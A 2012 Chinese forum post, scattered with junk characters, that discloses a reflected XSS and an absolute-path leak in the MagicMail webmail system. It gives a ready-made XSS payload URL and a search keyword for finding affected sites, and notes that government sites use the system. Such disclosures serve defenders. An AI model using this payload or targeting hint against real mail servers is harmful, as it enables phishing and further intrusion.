今天上午在黑盒测试本地的教育网的时候发现的一个邮件系统漏洞
6 n& J) W3 a, u- r, s) ~2 k6 j8 I0 _, O
1 ^0 p, f8 r( P# a0 }
包含 一个反射性XSS 以及 绝对路径泄漏
* l, z8 J8 J ?" v; i看了看 貌似全部是linux的。
% l2 ^, b+ E3 D3 l* v . C" Q0 P6 R4 Y- [3 |
关键字:迈捷邮件系统 by MagicMail
0 L5 j% L' L2 |0 H# o, e( @2 w% l9 s& D! ]
可以看到很多政府网站都用这个邮件系统9 r& C' z9 f. U5 }: F. x7 e: d4 U0 h
8 a1 F5 F/ m1 z9 ^, [: n/ e- u
绝对路径 http://madman.in/index.php?login_type=declare&language=
7 {$ F; j$ b m; F! r- V4 L! B3 Y' W* b, C' @
& L8 O7 n% c+ b' V3 j; g9 i% h6 d: S' T
XSS:http://madman.in/index.php?login_type=declare&language=–%3E%27%22%3E%3Csvg%3E%3Cscript/xlink:href=data:,while%28true%29{alert%281%29}%3E%3C/script%3E8 s& p& u" B* D9 m! @5 m
\1 w4 h5 e. |, d9 z& } A# Q% d: p- X4 Y: h! [! U
, W0 I3 l, ?# Y- q7 G虽然危害不是很大,不过利用起来还是可以的 比如 钓鱼 比如进一步的渗透 等等2 Z% R0 S9 y9 T
' F4 _% w" i7 V1 g+ N( s
修复方案:看官方补丁吧。" n6 x' N+ r7 ^7 S+ O* X
|
发表于 2012-11-9 20:38:41
收藏
支持
反对